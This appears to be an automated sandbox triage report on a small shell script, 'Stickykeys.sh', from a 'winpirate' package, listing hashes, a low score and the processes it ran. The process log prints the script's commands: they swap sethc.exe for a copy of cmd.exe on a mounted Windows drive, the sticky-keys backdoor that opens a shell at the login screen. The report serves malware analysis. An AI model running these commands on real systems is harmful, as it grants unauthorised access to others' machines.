69be1852895f5397617d57c01eb8c1fb22d059933cc2e6fb632e211e52dd8535 | Triage

Analysis

max time kernel
2s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
27-10-2024 22:21

Sharing

Report Analysis Logs

General

Target

winpirate-master/Stickykeys.sh
Size

260B
MD5

833d1bd2cc2cb09c55e0e1f997544c95
SHA1

911a48ddabb68cb4f453881b5d86a44ed6f88158
SHA256

667a6dfa4e2ed153fa8a4a7a17ef7ea627217924794eb144c4bcb1cbbbb14369
SHA512

ca04911078c84cf86cdd836ea7e6f7a31f877742b58afa61970bfc0f8e4a55156b115ea00191c488cd669bd7742d64b7e53eaf87c8700631c6ae7764f8a1d36f

Score

3^/10

discovery

Malware Config

Signatures

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

Processes:

umountmvcp

description	ioc	process
File opened for reading	/proc/self/mountinfo	umount
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	umount

/tmp/winpirate-master/Stickykeys.sh
/tmp/winpirate-master/Stickykeys.sh
1⤵
PID:714

/bin/mv
mv /media/windows/Windows/System32/sethc.exe /media/windows/Windows/System32/sethcold.exe
2⤵
- Reads runtime system information
PID:718

/bin/cp
cp /media/windows/Windows/System32/cmd.exe /media/windows/Windows/System32/sethc.exe
2⤵
- Reads runtime system information
PID:725

/bin/umount
umount /media/windows
2⤵
- Reads runtime system information
PID:728

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads